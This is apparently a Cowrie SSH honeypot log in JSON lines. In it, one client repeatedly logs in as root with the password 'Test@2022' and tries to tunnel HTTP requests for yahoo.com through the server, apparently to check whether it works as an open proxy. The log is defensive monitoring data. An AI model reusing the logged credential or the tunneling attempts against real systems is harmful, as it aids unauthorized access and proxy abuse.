{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.329248Z","src_ip":"213.209.150.239","session":"0ccf7fd86a03"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.378470Z","src_ip":"213.209.150.239","session":"0ccf7fd86a03"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7243,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed402ba3bbee","protocol":"ssh","message":"New connection: 213.209.150.239:7243 (1.2.3.4:22) [session: ed402ba3bbee]","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.424653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.425608Z","src_ip":"213.209.150.239","session":"ed402ba3bbee"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.472850Z","src_ip":"213.209.150.239","session":"ed402ba3bbee"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.707864Z","src_ip":"213.209.150.239","session":"ed402ba3bbee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14103,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14103","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.756121Z","session":"ed402ba3bbee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.803359Z","src_ip":"213.209.150.239","session":"ed402ba3bbee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":4425,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4425","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.941415Z","session":"ed402ba3bbee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:06.988495Z","src_ip":"213.209.150.239","session":"ed402ba3bbee"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.036336Z","src_ip":"213.209.150.239","session":"ed402ba3bbee"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7277,"dst_ip":"1.2.3.4","dst_port":22,"session":"b07cd9b846df","protocol":"ssh","message":"New connection: 213.209.150.239:7277 (1.2.3.4:22) [session: b07cd9b846df]","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.082900Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.083643Z","src_ip":"213.209.150.239","session":"b07cd9b846df"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.131119Z","src_ip":"213.209.150.239","session":"b07cd9b846df"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.367185Z","src_ip":"213.209.150.239","session":"b07cd9b846df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":25805,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:25805","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.416258Z","session":"b07cd9b846df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.463858Z","src_ip":"213.209.150.239","session":"b07cd9b846df"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":26284,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26284","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.601700Z","session":"b07cd9b846df"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.649250Z","src_ip":"213.209.150.239","session":"b07cd9b846df"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.697372Z","src_ip":"213.209.150.239","session":"b07cd9b846df"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7323,"dst_ip":"1.2.3.4","dst_port":22,"session":"5400137d331b","protocol":"ssh","message":"New connection: 213.209.150.239:7323 (1.2.3.4:22) [session: 5400137d331b]","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.753076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.754217Z","src_ip":"213.209.150.239","session":"5400137d331b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:07.810886Z","src_ip":"213.209.150.239","session":"5400137d331b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.094007Z","src_ip":"213.209.150.239","session":"5400137d331b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11317,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11317","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.152030Z","session":"5400137d331b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.208918Z","src_ip":"213.209.150.239","session":"5400137d331b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":3267,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:3267","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.363044Z","session":"5400137d331b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.419881Z","src_ip":"213.209.150.239","session":"5400137d331b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.477582Z","src_ip":"213.209.150.239","session":"5400137d331b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7373,"dst_ip":"1.2.3.4","dst_port":22,"session":"5db6c6fd9cab","protocol":"ssh","message":"New connection: 213.209.150.239:7373 (1.2.3.4:22) [session: 5db6c6fd9cab]","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.523669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.524942Z","src_ip":"213.209.150.239","session":"5db6c6fd9cab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.572052Z","src_ip":"213.209.150.239","session":"5db6c6fd9cab"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.807382Z","src_ip":"213.209.150.239","session":"5db6c6fd9cab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":3761,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:3761","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.855496Z","session":"5db6c6fd9cab"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":45358,"dst_ip":"1.2.3.4","dst_port":22,"session":"832545f3f8ec","protocol":"ssh","message":"New connection: 45.88.8.186:45358 (1.2.3.4:22) [session: 832545f3f8ec]","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.872771Z"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:08.902869Z","src_ip":"213.209.150.239","session":"5db6c6fd9cab"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":8460,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:8460","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.037622Z","session":"5db6c6fd9cab"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.085235Z","src_ip":"213.209.150.239","session":"5db6c6fd9cab"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.133750Z","src_ip":"213.209.150.239","session":"5db6c6fd9cab"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7418,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2f4e8eea5e7","protocol":"ssh","message":"New connection: 213.209.150.239:7418 (1.2.3.4:22) [session: b2f4e8eea5e7]","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.189514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.190293Z","src_ip":"213.209.150.239","session":"b2f4e8eea5e7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.247211Z","src_ip":"213.209.150.239","session":"b2f4e8eea5e7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.289355Z","src_ip":"45.88.8.186","session":"832545f3f8ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.290462Z","src_ip":"45.88.8.186","session":"832545f3f8ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.529996Z","src_ip":"213.209.150.239","session":"b2f4e8eea5e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12231,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12231","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.588048Z","session":"b2f4e8eea5e7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.645556Z","src_ip":"213.209.150.239","session":"b2f4e8eea5e7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":20079,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:20079","sensor":"my-vps","timestamp":"2025-08-26T01:00:09.799072Z","session":"b2f4e8eea5e7"}
